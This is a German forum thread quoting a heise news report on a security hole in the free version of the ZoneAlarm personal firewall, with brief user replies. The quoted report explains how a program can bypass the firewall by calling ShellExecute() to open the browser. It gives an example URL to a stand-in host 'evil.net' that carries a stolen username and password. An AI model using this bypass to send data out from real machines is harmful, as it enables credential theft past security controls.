ZoneAlarm: Gratis-Version mit Sicherheitsleck

  • Zitat

    Der Hersteller der Personal Firewall ZoneAlarm räumt die Existenz eines "theoretischen Sicherheitsproblems" in der kostenlosen Version seines Produkts ein. Zone Labs sieht aber keine Veranlassung, dieses zu beseitigen: Schließlich sei es in den kostenpflichtigen Versionen bereits behoben. Als Abhilfe empfiehlt der Hersteller jedoch lediglich den Umstieg auf die kostenpflichtigen Versionen ZoneAlarm Pro/Plus, die seit November 2002 beziehungsweise Februar 2003 solche ShellExecute-Aufrufe abfangen können. Eine Notwendigkeit, diese Funktion auch in die kostenlose Version einzubauen, sieht ZoneAlarm nicht

    Zitat


    Um an den Sperren der Personal Firewall vorbei Daten ins Internet zu übermitteln, kann ein Programm die Funktion ShellExecute() der Windows-Bibliothek shell32.dll mit einer URL aufrufen. Dann startet das System den Standard-Browser mit dieser URL. Der Browser darf normalerweise über Port 80 ins Internet und kann somit über eine URL wie etwa "http://evil.net/collect.cgi?stolen_username&pw=stolen_password"
    Daten vom lokalen Rechner an einen beliebigen Server senden


    heise

  • Na prima, dachte bisher das wäre ne gute Alternative zu Pay-Produkten...v.a. weil die Handhabung sehr einfach ist...

    on a mission 42.195...
    _____________________________________________________________
    Apple iPhone 3G 8 GB | Italien | 2.2.1 | Netz: o2

  • Zitat

    Innerhalb der nächsten zwei Wochen will Zone Labs jetzt jedoch einen Patch für die kostenlose Version anbieten.

    04.07.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!